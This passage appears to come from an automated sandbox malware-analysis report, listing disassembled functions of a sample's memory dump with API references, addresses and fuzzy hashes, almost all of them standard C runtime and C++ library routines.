                                                                      • _ValidateLocalCookies.LIBCMT ref: 00D98DF8
                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00D98E23
                                                                      • _ValidateLocalCookies.LIBCMT ref: 00D98E78
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                      • String ID: csm
                                                                      • API String ID: 1170836740-1018135373
                                                                      • Opcode ID: 57241c85830b91409184901ed05893329a6650184baa0df219b1341f3df067e2
                                                                      • Instruction ID: db8b62200d0265f6c71219036f6cb843a62def7dfed378d5c01a802477d43eab
                                                                      • Opcode Fuzzy Hash: 57241c85830b91409184901ed05893329a6650184baa0df219b1341f3df067e2
                                                                      • Instruction Fuzzy Hash: 69418334A00208DFCF10DF68C894A9EBBA6EF45724F148555F9159B392DB32EE05DBB1
                                                                      Function 00DAC96B Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FreeLibrary.KERNEL32(00000000,?,00DACA78,?,?,?,00000000,?,?,00DACCA2,00000021,FlsSetValue,00DC1E00,00DC1E08,?), ref: 00DACA2C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: FreeLibrary
                                                                      • String ID: api-ms-$ext-ms-
                                                                      • API String ID: 3664257935-537541572
                                                                      • Opcode ID: ad4b2a6689da6347be50446559e19cd2731c90e791e35244e10469c56724fa53
                                                                      • Instruction ID: a9793ca493305b9d1789af03bfec6f6e160020689e8b986fd56e78397231f30f
                                                                      • Opcode Fuzzy Hash: ad4b2a6689da6347be50446559e19cd2731c90e791e35244e10469c56724fa53
                                                                      • Instruction Fuzzy Hash: 2A21D536A51315EBCB21DB65AC44AAA3759DB437B1F291321E956E73D0EA30ED00CAF0
                                                                      Function 00D8D8F6 Relevance: 9.4, APIs: 6, Instructions: 433COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D8D8FD
                                                                      • ctype.LIBCPMT ref: 00D8D944
                                                                        • Part of subcall function 00D8D458: __Getctype.LIBCPMT ref: 00D8D467
                                                                        • Part of subcall function 00D879C9: __EH_prolog3.LIBCMT ref: 00D879D0
                                                                        • Part of subcall function 00D879C9: std::_Lockit::_Lockit.LIBCPMT ref: 00D879DA
                                                                        • Part of subcall function 00D879C9: std::_Lockit::~_Lockit.LIBCPMT ref: 00D87A4B
                                                                        • Part of subcall function 00D87AF3: __EH_prolog3.LIBCMT ref: 00D87AFA
                                                                        • Part of subcall function 00D87AF3: std::_Lockit::_Lockit.LIBCPMT ref: 00D87B04
                                                                        • Part of subcall function 00D87AF3: std::_Lockit::~_Lockit.LIBCPMT ref: 00D87B75
                                                                        • Part of subcall function 00D87CB2: __EH_prolog3.LIBCMT ref: 00D87CB9
                                                                        • Part of subcall function 00D87CB2: std::_Lockit::_Lockit.LIBCPMT ref: 00D87CC3
                                                                        • Part of subcall function 00D87CB2: std::_Lockit::~_Lockit.LIBCPMT ref: 00D87D34
                                                                        • Part of subcall function 00D87C1D: __EH_prolog3.LIBCMT ref: 00D87C24
                                                                        • Part of subcall function 00D87C1D: std::_Lockit::_Lockit.LIBCPMT ref: 00D87C2E
                                                                        • Part of subcall function 00D87C1D: std::_Lockit::~_Lockit.LIBCPMT ref: 00D87C9F
                                                                        • Part of subcall function 00D84403: __EH_prolog3.LIBCMT ref: 00D8440A
                                                                        • Part of subcall function 00D84403: std::_Lockit::_Lockit.LIBCPMT ref: 00D84414
                                                                        • Part of subcall function 00D84403: std::_Lockit::~_Lockit.LIBCPMT ref: 00D844BB
                                                                      • collate.LIBCPMT ref: 00D8DA78
                                                                      • numpunct.LIBCPMT ref: 00D8DCF2
                                                                        • Part of subcall function 00D8838F: __EH_prolog3.LIBCMT ref: 00D88396
                                                                        • Part of subcall function 00D880C5: __EH_prolog3.LIBCMT ref: 00D880CC
                                                                        • Part of subcall function 00D880C5: std::_Lockit::_Lockit.LIBCPMT ref: 00D880D6
                                                                        • Part of subcall function 00D880C5: std::_Lockit::~_Lockit.LIBCPMT ref: 00D88147
                                                                        • Part of subcall function 00D881EF: __EH_prolog3.LIBCMT ref: 00D881F6
                                                                        • Part of subcall function 00D881EF: std::_Lockit::_Lockit.LIBCPMT ref: 00D88200
                                                                        • Part of subcall function 00D881EF: std::_Lockit::~_Lockit.LIBCPMT ref: 00D88271
                                                                        • Part of subcall function 00D84403: Concurrency::cancel_current_task.LIBCPMT ref: 00D844C6
                                                                        • Part of subcall function 00D875B6: __EH_prolog3.LIBCMT ref: 00D875BD
                                                                        • Part of subcall function 00D875B6: std::_Lockit::_Lockit.LIBCPMT ref: 00D875C7
                                                                        • Part of subcall function 00D875B6: std::_Lockit::~_Lockit.LIBCPMT ref: 00D87638
                                                                      • __Getcoll.LIBCPMT ref: 00D8DAB8
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                        • Part of subcall function 00D784C0: LocalAlloc.KERNEL32(00000040,00000000,00D9839D,00000000,862265DA,?,00000000,?,00000000,?,00DBCB8D,000000FF,?,00D717D5,00000000,00DBD3BA), ref: 00D784C6
                                                                      • codecvt.LIBCPMT ref: 00D8DDA3
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: Lockitstd::_$H_prolog3$Lockit::_Lockit::~_$AllocConcurrency::cancel_current_taskGetcollGetctypeLocalcodecvtcollatectypenumpunct
                                                                      • String ID:
                                                                      • API String ID: 613171289-0
                                                                      • Opcode ID: 7e5c29d102b5bd0b5ceaa4f9d47c33486ec91861d9ff0181b8b44f75c9c32c4b
                                                                      • Instruction ID: 668d9a8e42d1fcd53c3ddff0a036f8fd1fee6db06bb04ecf1b39025d5a455903
                                                                      • Opcode Fuzzy Hash: 7e5c29d102b5bd0b5ceaa4f9d47c33486ec91861d9ff0181b8b44f75c9c32c4b
                                                                      • Instruction Fuzzy Hash: FBE1A2B1800216ABDB11BF658C06ABF7BA6EF41360F15842EF859573D1EF718D109BB1
                                                                      Function 00D7B500 Relevance: 9.2, APIs: 6, Instructions: 152COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D7B52D
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D7B550
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D7B578
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D7B5ED
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D7B617
                                                                      • LocalFree.KERNEL32 ref: 00D7B6C0
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_FreeLocalRegister
                                                                      • String ID:
                                                                      • API String ID: 1378673503-0
                                                                      • Opcode ID: 531cf6e860b93c360f5888be63b2ee222d2b3eeb60411b857ae92cca1e7a619e
                                                                      • Instruction ID: 5e848acc026c854d66a5308c71563d83d021648fffe335c74c89b749df87d544
                                                                      • Opcode Fuzzy Hash: 531cf6e860b93c360f5888be63b2ee222d2b3eeb60411b857ae92cca1e7a619e
                                                                      • Instruction Fuzzy Hash: F451BE71801759DFCB21DF58E841BAEBBF4FB05320F24865AE855A7390E771AA04CBB1
                                                                      Function 00DA5981 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 369COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: __freea$__alloca_probe_16
                                                                      • String ID: a/p$am/pm
                                                                      • API String ID: 3509577899-3206640213
                                                                      • Opcode ID: e93a7f18359107f207b1041c5aa24d6d7955c0ba981b994f98e5d35d553e60ae
                                                                      • Instruction ID: a716f0b067bef7f4994e3bed045388297bdafff58f3fc56eb8b035d8c19ab954
                                                                      • Opcode Fuzzy Hash: e93a7f18359107f207b1041c5aa24d6d7955c0ba981b994f98e5d35d553e60ae
                                                                      • Instruction Fuzzy Hash: FAC1C035900A16DBCF248F68E889BBAB7B0FF07310F284149E945AB659D335DD41CBB1
                                                                      Function 00D9AEF5 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,?,00D9AEEC,00D99710,00D985A3), ref: 00D9AF03
                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D9AF11
                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D9AF2A
                                                                      • SetLastError.KERNEL32(00000000,00D9AEEC,00D99710,00D985A3), ref: 00D9AF7C
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLastValue___vcrt_
                                                                      • String ID:
                                                                      • API String ID: 3852720340-0
                                                                      • Opcode ID: d272943d3484831036691c5dfc0e932f8eb1980258313673c7de02c07081397d
                                                                      • Instruction ID: 6db701fd940a8faabe42c84c3807fda4b907ff54ebc438ba99fa6a41b01d085e
                                                                      • Opcode Fuzzy Hash: d272943d3484831036691c5dfc0e932f8eb1980258313673c7de02c07081397d
                                                                      • Instruction Fuzzy Hash: BC01D47311E321AEAF246FB9EC85A267759DF02BB0724032AF110A21E1FF518D0062F6
                                                                      Function 00D8D38D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: Mpunct$GetvalsH_prolog3
                                                                      • String ID: $+xv
                                                                      • API String ID: 2204710431-1686923651
                                                                      • Opcode ID: aa0127b77343873770cf0f48cf17b3078dde268d8995bce24b71d98758983c4c
                                                                      • Instruction ID: 318a2ac45a0d02fcd636f2b0ecdf1be0719b35704c6ec9c3e654778496851dd7
                                                                      • Opcode Fuzzy Hash: aa0127b77343873770cf0f48cf17b3078dde268d8995bce24b71d98758983c4c
                                                                      • Instruction Fuzzy Hash: 182183B1904B52AED725EF75C45077BBFF8EB09700B04455AE499C7A81D734E601CBB0
                                                                      Function 00D783E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32(862265DA,862265DA,?,?,00000000,00DBA221,000000FF), ref: 00D7847B
                                                                        • Part of subcall function 00D97875: EnterCriticalSection.KERNEL32(00DD4AF8,00000000,?,?,00D725B6,00DD571C,862265DA,?,00000000,00DB93ED,000000FF,?,00D71A26), ref: 00D97880
                                                                        • Part of subcall function 00D97875: LeaveCriticalSection.KERNEL32(00DD4AF8,?,?,00D725B6,00DD571C,862265DA,?,00000000,00DB93ED,000000FF,?,00D71A26,?,?,?,862265DA), ref: 00D978BD
                                                                      • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 00D78440
                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00D78447
                                                                        • Part of subcall function 00D9782B: EnterCriticalSection.KERNEL32(00DD4AF8,?,?,00D72627,00DD571C,00DBCCC0), ref: 00D97835
                                                                        • Part of subcall function 00D9782B: LeaveCriticalSection.KERNEL32(00DD4AF8,?,?,00D72627,00DD571C,00DBCCC0), ref: 00D97868
                                                                        • Part of subcall function 00D9782B: RtlWakeAllConditionVariable.NTDLL ref: 00D978DF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalSection$EnterLeave$AddressConditionCurrentHandleModuleProcProcessVariableWake
                                                                      • String ID: IsWow64Process$kernel32
                                                                      • API String ID: 2056477612-3789238822
                                                                      • Opcode ID: be012d9985407ba0c38b47b4caac251691aa4ca77dfd9a77879f64ac28bacb50
                                                                      • Instruction ID: 01732262baf5e5ed746eca140467bf710943b1a4a91f73d00a33b5d134b7eaf1
                                                                      • Opcode Fuzzy Hash: be012d9985407ba0c38b47b4caac251691aa4ca77dfd9a77879f64ac28bacb50
                                                                      • Instruction Fuzzy Hash: F1117F72945B05FFCB10DFA4EC09B9977A8FB08721F24466BE815D3390EBB5A904CA71
                                                                      Function 00DA8461 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,862265DA,?,?,00000000,00DBCBE4,000000FF,?,00DA83F1,?,?,00DA83C5,?), ref: 00DA8496
                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00DA84A8
                                                                      • FreeLibrary.KERNEL32(00000000,?,00000000,00DBCBE4,000000FF,?,00DA83F1,?,?,00DA83C5,?), ref: 00DA84CA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                      • API String ID: 4061214504-1276376045
                                                                      • Opcode ID: beec67c277ee74a47fb97f8210655edb406a536b4c57122d04730e6677b2f8b5
                                                                      • Instruction ID: d9aefb4f4fa1734afcdc9c02f4eb6462973ae5a0b4544c24b3b0a4817975871e
                                                                      • Opcode Fuzzy Hash: beec67c277ee74a47fb97f8210655edb406a536b4c57122d04730e6677b2f8b5
                                                                      • Instruction Fuzzy Hash: 0C01A275904726EFCB018F54DC05FAEBBBAFB09B10F044629E811E2390DBB49900CAB0
                                                                      Function 00D8DDD2 Relevance: 7.9, APIs: 5, Instructions: 433COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00D8DDD9
                                                                      • collate.LIBCPMT ref: 00D8DF54
                                                                      • numpunct.LIBCPMT ref: 00D8E1CE
                                                                        • Part of subcall function 00D883C2: __EH_prolog3.LIBCMT ref: 00D883C9
                                                                        • Part of subcall function 00D8815A: __EH_prolog3.LIBCMT ref: 00D88161
                                                                        • Part of subcall function 00D8815A: std::_Lockit::_Lockit.LIBCPMT ref: 00D8816B
                                                                        • Part of subcall function 00D8815A: std::_Lockit::~_Lockit.LIBCPMT ref: 00D881DC
                                                                        • Part of subcall function 00D7EAF0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7EB1D
                                                                        • Part of subcall function 00D7EAF0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7EB40
                                                                        • Part of subcall function 00D7EAF0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7EB68
                                                                        • Part of subcall function 00D7EAF0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7EC07
                                                                        • Part of subcall function 00D84403: Concurrency::cancel_current_task.LIBCPMT ref: 00D844C6
                                                                        • Part of subcall function 00D8764B: __EH_prolog3.LIBCMT ref: 00D87652
                                                                        • Part of subcall function 00D8764B: std::_Lockit::_Lockit.LIBCPMT ref: 00D8765C
                                                                        • Part of subcall function 00D8764B: std::_Lockit::~_Lockit.LIBCPMT ref: 00D876CD
                                                                      • __Getcoll.LIBCPMT ref: 00D8DF94
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00D7BD10
                                                                        • Part of subcall function 00D7BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BD38
                                                                        • Part of subcall function 00D784C0: LocalAlloc.KERNEL32(00000040,00000000,00D9839D,00000000,862265DA,?,00000000,?,00000000,?,00DBCB8D,000000FF,?,00D717D5,00000000,00DBD3BA), ref: 00D784C6
                                                                        • Part of subcall function 00D7B9E0: __Getctype.LIBCPMT ref: 00D7B9EB
                                                                        • Part of subcall function 00D87A5E: __EH_prolog3.LIBCMT ref: 00D87A65
                                                                        • Part of subcall function 00D87A5E: std::_Lockit::_Lockit.LIBCPMT ref: 00D87A6F
                                                                        • Part of subcall function 00D87A5E: std::_Lockit::~_Lockit.LIBCPMT ref: 00D87AE0
                                                                        • Part of subcall function 00D87B88: __EH_prolog3.LIBCMT ref: 00D87B8F
                                                                        • Part of subcall function 00D87B88: std::_Lockit::_Lockit.LIBCPMT ref: 00D87B99
                                                                        • Part of subcall function 00D87B88: std::_Lockit::~_Lockit.LIBCPMT ref: 00D87C0A
                                                                        • Part of subcall function 00D87DDC: __EH_prolog3.LIBCMT ref: 00D87DE3
                                                                        • Part of subcall function 00D87DDC: std::_Lockit::_Lockit.LIBCPMT ref: 00D87DED
                                                                        • Part of subcall function 00D87DDC: std::_Lockit::~_Lockit.LIBCPMT ref: 00D87E5E
                                                                        • Part of subcall function 00D87D47: __EH_prolog3.LIBCMT ref: 00D87D4E
                                                                        • Part of subcall function 00D87D47: std::_Lockit::_Lockit.LIBCPMT ref: 00D87D58
                                                                        • Part of subcall function 00D87D47: std::_Lockit::~_Lockit.LIBCPMT ref: 00D87DC9
                                                                        • Part of subcall function 00D84403: __EH_prolog3.LIBCMT ref: 00D8440A
                                                                        • Part of subcall function 00D84403: std::_Lockit::_Lockit.LIBCPMT ref: 00D84414
                                                                        • Part of subcall function 00D84403: std::_Lockit::~_Lockit.LIBCPMT ref: 00D844BB
                                                                      • codecvt.LIBCPMT ref: 00D8E27F
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3$AllocConcurrency::cancel_current_taskGetcollGetctypeLocalcodecvtcollatenumpunct
                                                                      • String ID:
                                                                      • API String ID: 2252558201-0
                                                                      • Opcode ID: f67fc3711a3b47d08863c16aea2205a241b202083d75e8aea176bea52deabc6c
                                                                      • Instruction ID: 9ab73bbd30c6fb89e92517df562fc334dc6fcdf314e85c9e145a2c4876c3b46c
                                                                      • Opcode Fuzzy Hash: f67fc3711a3b47d08863c16aea2205a241b202083d75e8aea176bea52deabc6c
                                                                      • Instruction Fuzzy Hash: 34E1C37190021AABDB217F658C066BF7BA5EF41360F14842EF9596B391EF708D109BB1
                                                                      Function 00DAC382 Relevance: 7.7, APIs: 5, Instructions: 202COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __alloca_probe_16.LIBCMT ref: 00DAC409
                                                                      • __alloca_probe_16.LIBCMT ref: 00DAC4CA
                                                                      • __freea.LIBCMT ref: 00DAC531
                                                                        • Part of subcall function 00DAB127: HeapAlloc.KERNEL32(00000000,?,?,?,00DAAAAA,?,00000000,?,00D9C282,?,?,?,?,?,?,00D71668), ref: 00DAB159
                                                                      • __freea.LIBCMT ref: 00DAC546
                                                                      • __freea.LIBCMT ref: 00DAC556
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                      • String ID:
                                                                      • API String ID: 1096550386-0
                                                                      • Opcode ID: ac1c2c0b14302f84f18d2e5057c894ee05178bc9d1ea50e30d56ea78a4e413cf
                                                                      • Instruction ID: bd3dede2fa6ff2b23ab80004e2a07241f65bc0833d4ea8a95c8a8872e65a6a27
                                                                      • Opcode Fuzzy Hash: ac1c2c0b14302f84f18d2e5057c894ee05178bc9d1ea50e30d56ea78a4e413cf
                                                                      • Instruction Fuzzy Hash: 2651E772A2020AAFEF215F64CC41EBF36A9EF46360B195529FD08D7241EB75ED1087B0
                                                                      Function 00D7C590 Relevance: 7.6, APIs: 5, Instructions: 116COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D7C5BD
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D7C5E0
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D7C608
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D7C67D
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D7C6A7
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                      • String ID:
                                                                      • API String ID: 459529453-0
                                                                      • Opcode ID: 00df825122bb1383a1f9760db7b7a0c3eb6d7154ce184a52025ff8433387ee8d
                                                                      • Instruction ID: f29959b79debb01a4b6572232b54affba34cf29445e2dbf3bda25d5d35d0c44a
                                                                      • Opcode Fuzzy Hash: 00df825122bb1383a1f9760db7b7a0c3eb6d7154ce184a52025ff8433387ee8d
                                                                      • Instruction Fuzzy Hash: 9B41A375811659DFCB11DF58E885BAEBBB4EF04710F18815EE819A73A1E730AE04CBB1
                                                                      Function 00D7EAF0 Relevance: 7.6, APIs: 5, Instructions: 109COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D7EB1D
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D7EB40
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D7EB68
                                                                      • std::_Facet_Register.LIBCPMT ref: 00D7EBDD
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D7EC07
                                                                      Memory Dump Source
